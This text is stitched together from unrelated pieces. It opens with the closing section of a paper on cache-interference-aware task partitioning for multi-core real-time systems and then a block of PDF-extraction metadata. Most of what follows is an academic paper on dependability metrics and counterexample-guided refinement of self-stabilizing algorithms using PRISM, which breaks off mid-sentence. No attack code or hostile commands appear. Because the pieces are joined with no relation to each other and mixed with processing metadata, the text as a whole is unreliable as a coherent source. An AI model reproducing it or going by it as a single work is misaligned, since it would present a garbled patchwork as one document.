3\), while as the degree of cache interference increases, the schedulability performance gap becomes smaller, as shown in Figure 2(b) and Figure 3(b). One reason could be that even though tasks are sorted by different criteria, all variants of CITTA force recalculation of the upper bound on cache interference to obtain an upper bound that is as small as possible. The cache interference obtained by all variants of CITTA thus is likely to be similar. Therefore, if cache interference dominates the schedulability result, the gap of schedulability performance among different variants of CITTA is small. Cache interference degrades schedulability performance. Figure 2(a) and Figure 2(b) compare the acceptance ratio with different \( P \) and \( IF \) for tasksets consisting of 10 tasks. With the same \( U_{\text{tot}} \), the acceptance ratio achieved by all variants of CITTA and global EDF decrease as \( P \) and \( IF \) increase. This is because a larger \( P \) and \( IF \) indicate more tasks in the taskset having larger cache interference with each other, which can potentially increase the upper bound on cache interference, eventually making the interfered tasks unschedulable. Similar observation can be made from Figure 3(a) and Figure 3(b) for tasksets consisting of 20 tasks. 5.3 Average Execution Time We measured the execution time of CITTA with different taskset sizes. The executions are conducted on an Intel Xeon processor using only one core running at 2.4GHz. On average, it takes 0.85 seconds to run CITTA for assignment of the taskset consisting of 10 tasks to a processor with 4 cores, while it takes 2.3 seconds for tasksets with 20 tasks. 6 Conclusions Shared caches in multi-core processors introduce serious difficulties in providing guarantees on the real-time properties of embedded software. In this paper, we addressed the problem of task partitioning in the presence of cache interference. To achieve this, CITTA, a cache-interference aware task partitioning algorithm was proposed. An integer programming formulation was constructed to calculate the upper bound on cache interference exhibited by a task, which is required by CITTA. We conducted schedulability analysis of CITTA and formally proved the correctness of CITTA. A set of experiments was performed to evaluate the schedulability performance of CITTA against global EDF scheduling over randomly generated tasksets. Our empirical evaluations shows that CITTA outperforms global EDF scheduling in terms of tasksets deemed schedulable. As for future work, we plan to combine the task partitioning and cache partitioning approaches to design a new real-time scheduling algorithm that can achieve even better schedulability. References
{"Source-Url": "https://pure.uva.nl/ws/files/54844166/3372799.3394367.pdf", "len_cl100k_base": 13084, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 51898, "total-output-tokens": 17342, "length": "2e13", "weborganizer": {"__label__adult": 0.0004148483276367187, "__label__art_design": 0.00057220458984375, "__label__crime_law": 0.0004284381866455078, "__label__education_jobs": 0.001163482666015625, "__label__entertainment": 0.00014078617095947266, "__label__fashion_beauty": 0.00021791458129882812, "__label__finance_business": 0.0004758834838867187, "__label__food_dining": 0.0004606246948242187, "__label__games": 0.0014095306396484375, "__label__hardware": 0.006191253662109375, "__label__health": 0.0009312629699707032, "__label__history": 0.0005941390991210938, "__label__home_hobbies": 0.0001678466796875, "__label__industrial": 0.0010271072387695312, "__label__literature": 0.00028061866760253906, "__label__politics": 0.0003960132598876953, "__label__religion": 0.0006914138793945312, "__label__science_tech": 0.463623046875, "__label__social_life": 9.143352508544922e-05, "__label__software": 0.01154327392578125, "__label__software_dev": 0.50732421875, "__label__sports_fitness": 0.00035119056701660156, "__label__transportation": 0.0010976791381835938, "__label__travel": 0.0002772808074951172}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 54666, 0.03848]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 54666, 0.45223]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 54666, 0.85282]], "google_gemma-3-12b-it_contains_pii": [[0, 686, false], [686, 5026, null], [5026, 10512, null], [10512, 16410, null], [16410, 21826, null], [21826, 27331, null], [27331, 29127, null], [29127, 35589, null], [35589, 39905, null], [39905, 45205, null], [45205, 47327, null], [47327, 54666, null]], "google_gemma-3-12b-it_is_public_document": [[0, 686, true], [686, 5026, null], [5026, 10512, null], [10512, 16410, null], [16410, 21826, null], [21826, 27331, null], [27331, 29127, null], [29127, 35589, null], [35589, 39905, null], [39905, 45205, null], [45205, 47327, null], [47327, 54666, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 54666, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 54666, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 54666, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 54666, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 54666, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 54666, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 54666, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 54666, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 54666, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 54666, null]], "pdf_page_numbers": [[0, 686, 1], [686, 5026, 2], [5026, 10512, 3], [10512, 16410, 4], [16410, 21826, 5], [21826, 27331, 6], [27331, 29127, 7], [29127, 35589, 8], [35589, 39905, 9], [39905, 45205, 10], [45205, 47327, 11], [47327, 54666, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 54666, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
f12293067d39319a5f0ac3e604fcae3cb7594c74
Dependability Engineering of Silent Self-Stabilizing Systems Abhishek Dhama\textsuperscript{1}, Oliver Theel\textsuperscript{1}, Pepijn Crouzen\textsuperscript{2}, Holger Hermanns\textsuperscript{2}, Ralf Wimmer\textsuperscript{3}, and Bernd Becker\textsuperscript{3} \textsuperscript{1}System Software and Distributed Systems, University of Oldenburg, Germany \{abhishek.dhama, theel\}@informatik.uni-oldenburg.de \textsuperscript{2}Dependable Systems and Software, Saarland University, Germany \{crouzen, hermanns\}@cs.uni-saarland.de \textsuperscript{3}Chair of Computer Architecture, Albert-Ludwigs-University Freiburg, Germany \{wimmer, becker\}@informatik.uni-freiburg.de Abstract. Self-stabilization is an elegant way of realizing non-masking fault-tolerant systems. Sustained research over last decades has produced multiple self-stabilizing algorithms for many problems in distributed computing. In this paper, we present a framework to evaluate multiple self-stabilizing solutions under a fault model that allows intermittent transient faults. To that end, metrics to quantify the dependability of self-stabilizing systems are defined. It is also shown how to derive models that are suitable for probabilistic model checking in order to determine those dependability metrics. A heuristics-based method is presented to analyze counterexamples returned by a probabilistic model checker in case the system under investigation does not exhibit the desired degree of dependability. Based on the analysis, the self-stabilizing algorithm is subsequently refined. 1 Introduction Self-stabilization has proven to be a valuable design concept for dependable systems. It allows the effective realization of non-masking fault-tolerant solutions to a problem in a particularly hostile environment: an environment subject to arbitrarily many transient faults potentially corrupting the self-stabilizing system’s run-time state of registers and variables. Consequently, designing a self-stabilizing system is not an easy task, since many scenarios due to faults must correctly be handled beyond the fact that the system has to solve a given problem when being undisturbed by faults. The formal verification of a self-stabilizing solution to a given problem is therefore often quite complicated. It consists of a 1) convergence proof showing that the system eventually returns to a set of system states (called \textit{safe} or \textit{legal states}) where it solves the given problem and 2) a closure proof showing that once within the set of legal states, it does not leave this set voluntarily in the absence of faults occurring. Whereas the closure proof is often not too complicated, the convergence proof may become extremely challenging. It requires some finiteness argument showing the return of the system \textsuperscript{*} This work was supported by the German Research Foundation (DFG) under grant SFB/TR 14/2 “AVACS,” www.avacs.org. to the legal state set in a finite number of computational steps in the absence of newly manifested faults. As discussed, finding a self-stabilizing solution to a given problem as well as proving its self-stabilization property are generally not easy and present areas of agile research. But what, if multiple self-stabilizing solutions to a problem are already known? Which solution should be preferred and therefore be chosen? Clearly, many criteria do exists and their relevance depends on the concrete application scenario. In this paper, we focus on dependability properties of those systems. For example: “Does the given self-stabilizing system exhibit a system availability of at least $p$?” with system availability being only an example of a dependability metrics. Other metrics are, e.g., reliability, mean time to failure, and mean time to repair. Based on the evaluation of relevant dependability metrics, a decision should be taken of which solution out of the set of present solutions should be chosen and put to work for ones purposes. By building on [1], we present useful dependability metrics for differentiating among self-stabilizing solutions and show how to evaluate them. For this purpose, we propose the modeling of a self-stabilizing algorithm together with the assumed fault model in terms of a discrete-time Markov decision process or a discrete-time Markov chain. Whereas the former modeling allows – with the help of a probabilistic model checker – to reason about the behavior of the system under any fair scheduler, the latter modeling is suitable if concrete information about the scheduler used in the system setting is available. The self-stabilizing solution exhibiting the best dependability metrics value can then easily be identified and used. Furthermore, we show a possible way out of the situation where all available self-stabilizing solutions to a given problem have turned out to fail in the sense described above: if the dependability property under investigation cannot be verified for a particular system, then an automatically generated counterexample (being a set of traces for which, as a whole, the property does not hold) is prompted. By analyzing the counterexample, the self-stabilizing algorithm is then refined and again model-checked. This refinement loop is repeated until the dependability property is finally established or a maximal number of refinement loops has been executed. In the scope of the paper, wrt. abstraction scheme and system refinement, we restrict ourselves to silent self-stabilizing algorithms and a dependability metrics being a notion of limiting (system) availability called unconditional limiting availability in a system environment where faults “continuously keep on occurring.” Silent self-stabilizing algorithms do not switch among legal states in the absence of faults. Unconditional limiting availability is a generalization of limiting availability in the sense that any initial state of the system is allowed. Finally, with the more general fault model, we believe that we can analyze self-stabilizing systems in a more realistic setting: contrarily to other approaches, we do not analyze the system only after the last fault has already occurred but always allow faults to hamper with the system state. The paper is structured as follows: in Section 2, we give an overview of related work. Then, in Section 3, we introduce useful dependability metrics for self-stabilizing systems. Additionally, we state the model used for dependability metrics evaluation based on discrete-time Markov decision processes or discrete- time Markov chains. Section 4 describes the refinement loop and thus, depend- ability engineering based on probabilistic model-checking, counterexample gen- eration, counterexample analysis, and silent self-stabilizing system refinement along with an abstraction scheme to overcome scalability problems. Section 5, finally, concludes the paper and sketches our future research. 2 Related Work The body of literature is replete with efforts towards the engineering of fault- tolerant systems to increase dependability. In [2], a formal method to design a – in a certain sense – multitolerant system is presented. The method employs detectors and correctors to add fault tolerance with respect to a set of fault classes. A detector checks whether a state predicate is satisfied during execution. A corrector ensures that – in the event of a state predicate violation – the program will again satisfy the predicate. It is further shown in [3] that the detector-corrector approach can be used to obtain masking fault-tolerant from non-masking fault-tolerant systems. But, despite its elegance, the fault model used in their applications admits only transient faults. Ghosh et al. described in [4] an approach to engineer a self-stabilizing system in order to limit the effect of a fault. A transformer is provided to modify a non-reactive self-stabilizing system such that the system stabilizes in constant time if a single process is faulty. However, there is a trade-off involved in using the transformer as discussed in [5]. The addition of such a transformer to limit the recovery time from a single faulty process might lead to an increase in stabilization time. A compositional method, called “cross-over composition,” is described in [6] to ensure that an algorithm self-stabilizing under a specific scheduler converges under an arbitrary scheduler. This is achieved by composing the target “weaker” algorithm with a so-called “strong algorithm” such that actions of the target algorithm are synchronized with the strong algorithm. The resultant algorithm is self-stabilizing under any scheduler under which the strong algorithm is proven to be self-stabilizing. However, the properties of the strong algorithm determine the class of schedulers admissible by the composed algorithm. Recent advances in counterexample generation for stochastic model checking has generated considerable interest in using the information given by the coun- terexamples for debugging or optimizing systems. An interactive visualization tool to support the debugging process is presented in [7]. The tool renders viol- ing traces graphically along with state information and probability mass. It also allows the user to selectively focus on a particular segment of the violating traces. However, it does not provide any heuristics or support to modify the system in order to achieve the desired dependability property. Thus, the user must modify systems by hand without any tool support. In addition to these shortcomings, only models based on Markov chains are handled by the tool. In particular, models containing non-determinism cannot be visualized. We will next describe the method to evaluate dependability metrics of self- stabilizing systems with an emphasis on silent self-stabilizing systems. 3 Dependability Evaluation of Self-Stabilizing Systems We now present a procedure with tool support for evaluating dependability metrics of self-stabilizing systems. A self-stabilizing BFS spanning tree algorithm given in [8] is used as a working example throughout the sections to illustrate each phase of our proposed procedure. Note that the method nevertheless is applicable to any other self-stabilizing algorithm as well. 3.1 Dependability Metrics The definition and enumeration of metrics to quantify the dependability of a self-stabilizing system is the linchpin of any approach for dependability evaluation. This becomes particularly critical in the case of self-stabilizing systems as the assumptions made about the frequency of faults may not hold true in a given implementation scenario. That is, faults may be intermittent and the temporal separation between them, at times, may not be large enough to allow the system to converge. In this context, reliability, instantaneous availability, and limiting availability have been defined for self-stabilizing systems in [1]. An important part of these definitions is the notion of a system doing “something useful.” A self-stabilizing system is said to do something useful if it satisfies the safety predicate (which in turn specifies the set of legal states) with respect to which it has been shown to be self-stabilizing. We now define the mean time to repair (MTTR) and the mean time to failure (MTTF) along with new metrics called unconditional instantaneous availability and generic instantaneous availability for self-stabilizing systems. These metrics are measures (in a measure theoretic sense) provided the system under study can be considered as a stochastic process. It is natural to consider discrete-state stochastic processes, where the set of states is divided into a set of operational states (“up states”) and of disfunctional states (“down states”). The basic definition of instantaneous availability at time $t$ quantifies the probability of being in an “up state” at time $t$ [9]. Some variations are possible with respect to the assumption of the system being initially available, an assumption that is not natural in the context of self-stabilizing systems, since these are designed to stabilize from any initial state. Towards that end, we define generic instantaneous availability and unconditional instantaneous availability and apply them in the context of self-stabilizing systems. Our natural focus is on systems evolving in discrete time, thus where the system moves from states to states in steps. Time is thus counted in steps, and $s_i$ refers to the state occupied at time $i$. Generic instantaneous availability at step $k$ $A_G(k)$ is defined as probability $Pr(s_k \models P_{\text{up}} | s_0 \models P_{\text{init}})$, where $P_{\text{up}}$ is a predicate that specifies the states where the system is operational, doing something useful, $P_{\text{init}}$ specifies the initial states. Unconditional instantaneous availability at step $k$ $A_U(k)$ is defined as the probability $Pr(s_k \models P_{\text{up}} | s_0 \models \text{true})$. Unconditional instantaneous availability is the probability that the system is in “up state” irrespective of the initial state. Generic instantaneous availability is the probability that the system is in “up state” provided it was started in some specific set of states. As $k$ approaches $\infty$ — provided the limit exists — instantaneous, unconditional, and generic instantaneous availability are all equal to limiting availability. The above definitions can be readily used in the context of silent self-stabilizing systems by assigning $P_{up} = P_S$, where $P_S$ is the safety predicate of the system. Hence, unconditional instantaneous availability of a silent self-stabilizing system is the probability that the system satisfies its safety predicate at an instant $k$ irrespective of its starting state. Generic instantaneous availability of a silent self-stabilizing system is the probability of satisfying the safety predicate provided it started in any initial state characterized by predicate $P_{init}$. **Mean time to repair (MTTR)** of a self-stabilizing system is the average time (measured in the number of computation steps) taken by a self-stabilizing system to reach a state which satisfies the safety predicate $P_S$. The average is taken over all the executions which start in states not satisfying the safety predicate $P_S$. As mentioned earlier, a system has “recovered” from a burst of transient faults when it reaches a safe state. It is also interesting to note that the MTTR mirrors the average case behavior under a given implementation scenario unlike bounds on convergence time that are furnished as part of convergence proofs of self-stabilizing algorithms. **Mean time to failure (MTTF)** of a self-stabilizing system is the average time (again measured in the number of computation steps) before a system reaches an unsafe state provided it started in a safe state. This definition may appear trivial for a self-stabilizing system as the notion of MTTF is void given the closure property of self-stabilizing systems. However, under relaxed fault assumptions, the closure is not guaranteed because transient faults may “throw” the system out of the safe states once it has stabilized. Thus, MTTF may well be finite. There is an interplay between MTTF and MTTR of a self-stabilizing system since its limiting availability also agrees with $\frac{MTTF}{MTTR + MTTF}$ [9]. That is, a particular value of MTTF is an environment property over which a system designer has often no control, but the value of MTTR, in the absence of on-going faults, is an intrinsic property of a given implementation of a self-stabilizing system along with the scheduler used (synonymously referred to as self-stabilizing system). One can modify the self-stabilizing system leading to a possible decrease in average convergence time. The above expression gives a compositional way to fine tune the limiting availability by modifying the MTTR value of a self-stabilizing system despite a possible inability to influence the value of MTTF. ### 3.2 Model for Dependability Evaluation The modeling of a self-stabilizing system for performance evaluation is the first step of the toolchain. We assume that the self-stabilizing system consists of a number of concurrent components which run in parallel. These components cooperate to bring the system to a stable condition from any starting state. Furthermore, we assume that at any time a fault may occur which brings the system to an arbitrary state. Guarded command language. We can describe a self-stabilizing system using a guarded command language (GCL) which is essentially the language used by the probabilistic model checker PRISM [10]. The model of a component consists of a finite set of variables describing the state of the component, initial valuations for the variables and a finite set of guarded commands describing the behavior (state change) of the component. Each guarded command has the form \[ \text{[label]} \text{ guard} \rightarrow \text{prob}_1 : \text{update}_1 + \ldots + \text{prob}_n : \text{update}_n \] Intuitively, if the guard (a Boolean expression over the set of variables) is satisfied, then the command can be executed. One branch of the command is selected probabilistically and the variables are updated accordingly. Deterministic behaviour may be modeled by specifying only a single branch. The commands in the model may be labeled. Figure 1 gives a sketch of a self-stabilizing BFS algorithm of [8] with three components representing a process each. Fault inducing actions are embedded in every component. There are a number of important properties inherent in the model in Figure 1. First, at every step, it is open whether a fault step or a computational step occurs. If a computational step occurs, it is also unclear which component executes a command. Finally, in the case of a fault step, it is unclear which fault occurs, i.e. what the resulting state of the system will be. The model in Figure 1 is thus non-deterministic since it does not specify how these choices must be resolved. Schedulers. To resolve the non-determinism in the model, and thus to arrive at a uniquely defined stochastic process, one usually employs schedulers. In essence, a scheduler is an abstract entity resolving the non-determinism among the possible choice options at each time step. A set of schedulers is called a scheduler class. For a given scheduler class, one then aims at deriving worst-case and best-case results for the metric considered, obtained by ranging over all stochastic processes induced by the individual schedules in the class. This computation is performed by the probabilistic model checking machinery. Schedulers can be characterized in many ways, based on the power they have: A scheduler may make decisions based on only the present state (memoryless scheduler) or instead based on the entire past history of states visited (history-dependent scheduler). A scheduler may be randomized or simply be deterministic. A randomized scheduler may use probabilities to decide between choice options, while deterministic ones may not. For instance, we can consider the class of randomized schedulers that, when a fault step occurs, chooses the particular fault randomly with a uniform distribution. When adding this assumption to the GCL specification of the fault model, the resulting system model becomes partially probabilistic as shown in Figure 2 for the root module. It is still non-deterministic with respect to the question whether a fault step occurs, or which component performs a step. Here, we encoded the probabilistic effect of the schedulers considered inside the GCL specification, while the remaining non-determinism is left to the background machinery. It would also be possible to specify a choice according to a probability distribution that is obtained using information collected from the history of states visited (history-dependent scheduler), or according to a distribution gathered from statistics about faults occurring in real systems. module root variable x02,x01 : int ...; [stepRoot] true -> 1: x01' = 0 & x02'=0 ...[faultRoot] true -> 1/n: x01' = 0 & x02'=1+ ...[faultRootn] true -> 1/n: x01'=2 & x02'=2; endmodule module proc1 variable x10,x12,dis1 : int ...; [stepProc1] true -> 1: (dis1'= min( min(dis1,x01,x21)+1,N))& (x10' = ...) & (x12'=...); [faultProc1] true -> 1: dis1'=0 & (x10'=0)&(x12'=1) ...[faultProc1n] true -> 1: (dis1'=2) & (x10'=2)&(x12'=2); endmodule module proc2 ... endmodule Fig. 1. Non-deterministic self-stabilizing BFS algorithm with faults. Markov decision processes. The formal semantics of a GCL model is a Markov decision process (MDP). A MDP is a tuple $D = \{S, A, P\}$ where $S$ is the set of states, $A$ is the set of possible actions, and $P \subseteq S \times A \times \text{Dist}(S)$ is the transition relation that gives for a state and an action the resulting probability distribution that determines the next state. In the literature, MDPs are often considered equipped with a reward structure, which is not needed in the scope of this paper. Intuitively, we can derive a MDP from a GCL model in the following way. The set of states of the MDP is the set of all possible valuations of the variables in the GCL model. The set of actions is the set of labels encountered in the GCL model. For each state we find a set of commands for which the guard is satisfied. Each such command then gives us an entry in the transition relation where the action is given by the label associated with the command and the resulting distribution for the next state is determined by the distribution over the updates in the GCL description. In Figure 3 (left), we see an example of a MDP state with its outgoing transitions for our example model from Figure 1 (where the choice of fault is determined probabilistically as in Figure 2). We see that in every state either a fault may occur, after which the resulting state is chosen probabilistically or a computational step may occur. The choice between faults or different computational steps is still non-deterministic. Markov chain. When we consider a specific scheduler that resolves all non-deterministic choices either deterministically or probabilistically, we find a model whose semantics is a particular kind of MDP, namely that has for each state $s$ exactly one transition $(s,a,\mu)$ in the transition relation $P$. If we further disregard the actions of the transitions, we arrive at a model which can be interpreted as a Markov chain. We define a Markov chain as a tuple $D = \{S, P\}$ where $S$ is the set of states and $P \subseteq S \rightarrow \text{Dist}(S)$ is the transition relation that gives for a state the probability distribution that determines the next state. A Markov chain is a stochastic process which is amenable to analysis. module root variable x02,x01 : int ...; [stepRoot] true -> 1: x01' = 0 & x02'=0 ...[faultRoot] true -> 1/n: x01' = 0 & x02'=1+ ...[faultRootn] true -> 1/n: x01'=2 & x02'=2; endmodule Fig. 2. Root module with a randomized scheduler for $n$ distinct faults. For our example, we can find a Markov chain model if we assume a scheduler that chooses probabilistically whether a fault occurs, which component takes a step in case of normal computation and which fault occurs in case of a fault step. Figure 4 shows the probabilistic model for the root module and Figure 3 (right) shows part of the resulting model, where $P_A$, $P_B$ and $P_{\text{fault}}$ denote the probabilities that, respectively, component $A$ takes a step, component $B$ takes a step, or a fault occurs. Choosing a scheduler class. Scheduler classes form a hierarchy, induced by set inclusion. For MDPs, the most general class is the class of history-dependent randomized schedulers. Deterministic schedulers can be considered as specific randomized schedulers that schedule with probability 1 only, and memoryless schedulers can be considered as history-dependent schedulers that ignore the history apart from the present state. In the example discussed above (Figure 2 and Figure 4), we have sketched how a scheduler class can be shrunk by adding assumptions about a particular probabilistic behaviour. We distinguish two different strategies of doing so: Restricted resolution refers to scheduler classes where some non-deterministic options are pruned away. In partially probabilistic resolution some of the choices are left non-deterministic, while others are randomized (as in Figure 3, left). A fully randomized scheduler class contains a single scheduler only, resolves all non-determinism probabilistically. Recall that deterministic schedulers are specific randomized schedulers that schedule with probability 1 only, and memoryless schedulers can be considered as history-dependent schedulers that ignore the history apart from the present state. Choosing a class of schedulers to perform analysis on is not trivial. If we choose too large a class, probability estimations can become so broad as to be unusable (e.g. the model checker may conclude that a particular probability measure lies somewhere between 0 and 1). Choosing a smaller class of schedulers results in tighter bounds for our probability measures. However, choosing a small scheduler class requires very precise information about the occurrence of faults and the scheduling of processes. Furthermore, such analysis would only inform us about one very particular case. A more general result is usually desired, that takes into account different fault models or scheduling schemes. More advanced scheduler classes are also possible. For the scheduling of $n$ processes, we allow only those schedules where each process performs a computational step at least every $k$ steps. This is akin to assuming that the fastest process is at most twice as fast as the slowest one. While such assumptions are interesting to investigate, they also make analysis more difficult. To implement such a $k$-bounded scheduler, it is required to track the last computational step of every process. Though, the size of the state space does not scale well for large $n$ and $k$. Model checking. A model checker, such as PRISM [10] may be employed to answer reachability questions for a given MDP model. The general form of such a property is $P_{< p} [A \cup B \leq k]$ which checks whether the probability that a state with property $B$ is reached within $k$ steps via a path consisting of states in which $A$ holds only, is smaller than $p$. In this way instantaneous availability properties can be checked. If the property does not hold, a counterexample is generated. We next explain the methods to re-engineer a self-stabilizing system based on a counterexample provided by a probabilistic model checker. 4 Dependability Engineering for Self-Stabilizing Systems In order to meet the quality of service requirements, the counterexample returned by the model checker can be used to optimize the system. An important distinction between counterexample generation of qualitative model checking versus quantitative model checking is the fact that quantitative model checking returns a set of paths as counterexample. This distinction needs to be taken into account while devising a method for exploiting the counterexample. We explain a heuristics-based method to modify a system given such a set of paths. The self- stabilizing BFS spanning tree algorithm implemented on a three-process graph under a fully randomized scheduler is used as an illustrative example. We used the stochastic bounded model checker sbmc [11] alongwith PRISM to generate counterexamples. Please note that this particular method applies beneficently only to scenarios where faults follow a uniform probability distribution over the system states. 4.1 Counterexample Structure An understanding of the structure of the elements of the set of paths returned as counterexample is important to devise a method to modify the system. In the scope of this section, we are interested in achieving a specific unconditional instantaneous availability \( A_U(k) \) which is basically the step-bounded reachability probability of a legal state. However, the tool used to generate the counterexample can only generate counterexamples for queries that contain an upper bound on the probability of reaching a set of certain states. Therefore, a reformulated query is presented to the model checker. Instead of asking queries of the form “Is the probability of reaching a legal state within \( k \) steps greater than \( p \)?,” i.e. \( P > p \) \([true \cup \leq_k \text{ legal}]\) the following query is given to the model checker: \( P_{\leq (1-p)} \) \([-\text{legal} \vee \leq_k \text{ false}]\). The reformulated query ascertains whether the probability of reaching non-legal states within \( k \) steps is less than \( 1 - p \). The probability \( p \) used in the queries is equal to the desired value of \( A_U(k) \), namely unconditional instantaneous availability at step \( k \). In case the probability of reaching non-legal states is larger than the desired threshold value, the probabilistic model checker returns a set of paths of length \( k \). This set consists of \( k \)-length paths such that all the states in the path are non-legal states. The probability of these paths is larger than the threshold specified in the query. This set of paths constitutes a counterexample because the paths as a whole violate the property being model-checked. In order to devise a system optimization method we “dissect” a generic path – annotated with transition probabilities – of length 2 (shown below) for a system with a uniform fault probability distribution. \[ \begin{array}{c} s_i \quad s_{j1} \quad s_j \quad s_{k1} \quad s_k \quad s_{l1} \\ p_f \quad p_f \quad p_f \quad p_f \quad p_f \\ \vdots \quad p_c \quad p_c \quad p_c \quad p_c \\ s_{im} \quad s_{jm} \quad s_{jm} \quad s_{lm} \quad s_{lm} \end{array} \] \( p_{c1} \) and \( p_{c2} \) are probabilities of state transitions due to a computation step whereas \( p_f \) is the probability of a fault step. Note that due to the uniform fault probability distribution there is a pair of fault transitions between each pair of system states. If the above path is seen in contrast with a fault-free computation of length 2, one can identify the reason for the loss of probability mass. Consider a path that reaches state \( s_k \) from state \( s_i \) in two steps. \[ \begin{array}{c} s_i \quad s_j \quad s_k \\ \downarrow \quad \downarrow \\ \ldots \quad \ldots \end{array} \] Such a path can be extracted from a MDP-based model by choosing a specific scheduler. It results in a fully deterministic model because of the absence of fault steps, thereby leaving the model devoid of any stochastic behavior. The probability associated with each of the two transitions is 1 and therefore the probability of the path is 1 as well [12]. However, the addition of fault steps to the model reduces probabilities associated with computation steps and thus, reduces the probability of the path. In the light of this discussion, we next outline a method to modify the system in order to achieve a desired value of \( A_U(k) \). 4.2 Counterexample-guided System Re-engineering We consider the set of paths of length $k$ returned by the probabilistic model checker. In Step 1, we remove the extraneous paths from the counterexample. In Step 2, we add and remove certain transitions to increase $A_U(k)$. **Step 1.** As explained above, a counterexample consists of all those paths of length $k$ whose probability in total is greater than the threshold value. This set also consists of those $k$-length paths where some of the transitions are fault steps. The number of possible paths grows combinatorially as $k$ increases because the uniform fault model adds transitions between every pair of states. For example, as there are (fault) transitions between each pair of states, the probabilistic model checker can potentially return all the transitions of the Markov chain for $k = 1$. Hence, the problem becomes intractable even for small values of $k$. Therefore, such paths are removed from the set of paths. The resultant set of paths consists of only those $k$-length paths where all the transitions are due to computation steps. The self-stabilizing BFS spanning tree algorithm was model checked to verify whether the probability of reaching the legal state within three steps is higher than 0.65. The example system did not satisfy the property and thus, the conjunction of PRISM and sbmc returned a set of paths as counterexample. This set contains 190928 paths in total out of which a large number of paths consist of fault steps only. An instance of such a path is shown below. $\langle 2, 1, 2, 2, 1, 1, 2 \rangle \rightarrow \langle 2, 2, 2, 2, 1, 0, 0 \rangle \rightarrow \langle 2, 2, 2, 0, 0, 0, 0, 0 \rangle \rightarrow \langle 2, 2, 0, 0, 0, 0, 0, 1 \rangle$ A state in the path is represented as a vector $s_i = \langle x_{01}, x_{02}, x_{11}, x_{12}, dis_1, dis_2, x_{20}, x_{21} \rangle$ where $x_{ij}$ is the communication register owned by process proc$_i$ and dis$_i$ is the local variable of proc$_i$. The removal of such extraneous paths lead to a set of 27 paths. **Step 2.** The probability of a path without a loop is the product of the individual transition probabilities. Due to the presence of fault steps and associated transition probabilities, one cannot increase the probability measure of the path without decreasing the path length. Consider a path $$s_i \xrightarrow{p_i} s_j \xrightarrow{p_j} s_k \xrightarrow{p_k} s_l$$ and the modified path obtained by 1) adding a direct transition between states $s_i$ and $s_l$ and 2) disabling the transition between states $s_i$ and $s_j$. $$s_i \xrightarrow{p_i} s_j \xrightarrow{p_j} s_k \xrightarrow{p_k} s_l$$ The addition of a direct transition to state $s_l$ and thereby the reduction of the path length leads to an increase in probability of reaching state $s_l$ from state $s_i$. The method thus strives to increase the value of $A_U(k)$ by reducing the length of the paths. As we have no control over the occurrence of fault steps, such transitions can neither be removed nor the probabilities associated with these transitions be altered. Thus, in essence, we increase the number of paths with length less than $k$ and decrease $k$-length paths to the legal state. The paths in the counterexample are arranged in decreasing order of probability. The following procedure is applied to all the paths starting with the most probable path. We begin with the first state \( s_0 \) of a path. In order to ensure that a transition is feasible between \( s_i \) and \( s_j \), we determine the variables whose valuations need to be changed to reach state \( s_j \) from state \( s_i \). A transition is deemed feasible for addition to a system if the variable valuations can be changed in a single computation step under a specific sequential randomized scheduler. If a transition from state \( s_0 \) to the legal state \( s_l \) is deemed feasible, then a guarded command to effect that state transition is added to the system. In case such a direct transition is not feasible, then transitions are added to modify the local states of the processes to decrease the convergence time. This method can be iterated over the initial states of the paths returned till the desired threshold is achieved or all the returned paths are used up. Addition of such transitions, however, requires some knowledge of the algorithm under consideration. For instance, a state transition to \( s_l \) that leads to a maximal decrease in convergence time might require change of variables belonging to more than one process. Such a transition is not feasible if an algorithm is implemented with a sequential scheduler. Infeasibility of a direct state transition to \( s_l \) may also result from the lack of “global knowledge.” Let \( s_i \rightarrow s_l \) be the transition that leads to a maximal decrease in convergence time and let \( \text{proc}_x \) be the process whose local state must be changed to effect the aforementioned state transition. Process \( \text{proc}_x \), therefore, needs a guarded command that changes its local state if system is in a specific global state. However, process \( \text{proc}_x \) cannot determine local states of all processes in a system unless the communication topology of system is a completely connected graph. Transition \( s_i \rightarrow s_l \), in this, is infeasible for communication topologies which are not completely connected. This is, however, an extremal case because usually processes – instead of global knowledge – require knowledge of their extended “neighborhood.” We applied the above procedure on the example system by analyzing the resultant set of paths after removing paths with fault steps. The state \( s_b = \langle 2, 2, 1, 2, 2, 1, 1, 2 \rangle \) was the most probable illegal state. The paths having this state as the initial state were inspected more closely; a direct transition to the legal state \( \langle 0, 0, 1, 1, 1, 1, 1, 1 \rangle \) was not feasible because it required changes in variable valuations in all three processes in a single step. However, a transition could be added to correct the local state of the non-root process if the system is in state \( s_b \), then the (activated) process corrects its local state. The communication topology of the example system allows each process to access the local states of all the process. Thus, guarded commands of the form \[ \text{[stepstateB] state=stateB -> state'= correctstate} \] were added to the processes \( \text{proc}_1 \) and \( \text{proc}_2 \). The modification of the system led to an increase in probability (of reaching the legal state from state \( s_b \)) from 0.072 to 0.216. The method described above can be used to modify the system for a given scheduler under a fault model with ongoing faults. However, the very fact that the scheduler is fixed limits the alternatives to modify the system. For instance, many transitions which could have potentially increased \( A_\ell(k) \) were rendered infeasible. for the example system. This, in turn, can lead to an insufficient increase in $A_U(k)$ or 